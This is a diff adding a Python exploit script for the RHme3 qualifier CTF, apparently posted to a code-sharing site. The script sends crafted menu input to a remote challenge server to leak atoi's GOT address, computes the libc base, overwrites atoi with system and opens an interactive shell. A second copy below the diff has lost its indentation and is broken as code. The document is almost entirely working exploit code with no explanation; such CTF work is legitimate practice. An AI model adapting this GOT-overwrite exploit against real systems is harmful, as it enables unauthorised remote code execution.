arisada · August 28, 2017 22:30
diff --git a/rhme3_quals_xp.py b/rhme3_quals_xp.py
 #!/usr/bin/env python3

 import struct
 from libctf import *

 port=1337

 atoi_got = 0x603110

 #ubuntu 14.04
 #atoi_offset = 0x039ea0
 #system_offset = 0x46590
 #host="127.0.0.1"

 # target
 atoi_offset = 0x36e80
 system_offset = 0x45390
 host = "pwn.rhme.riscure.com"

 s = Socket(host, port)
 s.connect()
 print(s.readline())
 #input("Attach now:")

 leakaddr=q(atoi_got)
 while leakaddr[-1]==0:
 	leakaddr=leakaddr[:-1]

 payload = \
 b"""1\nABCD\n0\n0\n0\n0\n1\nEFGH\n0\n0\n0\n0\n3\n1\n2\n1\n2\n0\n1\n""" + \
 b"""CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDD\n""" + \
 b"""0\n0\n0\n0\n1\n"""

 s.send(payload)
 for i in range(4):
 	s.expect(b"Enter player name: ")
 payload2 = b"""AAAABBBBCCCCDDDD""" + leakaddr + b"""\n0\n0\n0\n0\n"""
 s.send(payload2)

 s.send(b"5\n")
 s.expect(b"Name: ")
 leak = s.recv(9)
 stop = leak.find(b"\n")
 if stop != -1:
 	leak = leak[:stop]
 leak = leak + b'\x00' * (8-len(leak))
 atoi_addr = struct.unpack("<Q", leak)[0]
 print("atoi address: %x"%(atoi_addr,))
 base = atoi_addr - atoi_offset
 print("Libc base: %x"%(base,))
 payload3=struct.pack("<Q", base + system_offset)
 while payload3[-1]==0:
 	payload3=payload3[:-1]

 s.send(b"4\n1\n" + payload3 + b'\n')
 print("Enjoy your shell")
 s.interactConsole()
 s.close()
	#!/usr/bin/env python3

	import struct
	from libctf import *

	port=1337

	atoi_got = 0x603110

	#ubuntu 14.04
	#atoi_offset = 0x039ea0
	#system_offset = 0x46590
	#host="127.0.0.1"

	# target
	atoi_offset = 0x36e80
	system_offset = 0x45390
	host = "pwn.rhme.riscure.com"

	s = Socket(host, port)
	s.connect()
	print(s.readline())
	#input("Attach now:")

	leakaddr=q(atoi_got)
	while leakaddr[-1]==0:
	leakaddr=leakaddr[:-1]

	payload = \
	b"""1\nABCD\n0\n0\n0\n0\n1\nEFGH\n0\n0\n0\n0\n3\n1\n2\n1\n2\n0\n1\n""" + \
	b"""CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDD\n""" + \
	b"""0\n0\n0\n0\n1\n"""

	s.send(payload)
	for i in range(4):
	s.expect(b"Enter player name: ")
	payload2 = b"""AAAABBBBCCCCDDDD""" + leakaddr + b"""\n0\n0\n0\n0\n"""
	s.send(payload2)

	s.send(b"5\n")
	s.expect(b"Name: ")
	leak = s.recv(9)
	stop = leak.find(b"\n")
	if stop != -1:
	leak = leak[:stop]
	leak = leak + b'\x00' * (8-len(leak))
	atoi_addr = struct.unpack("<Q", leak)[0]
	print("atoi address: %x"%(atoi_addr,))
	base = atoi_addr - atoi_offset
	print("Libc base: %x"%(base,))
	payload3=struct.pack("<Q", base + system_offset)
	while payload3[-1]==0:
	payload3=payload3[:-1]

	s.send(b"4\n1\n" + payload3 + b'\n')
	print("Enjoy your shell")
	s.interactConsole()
	s.close()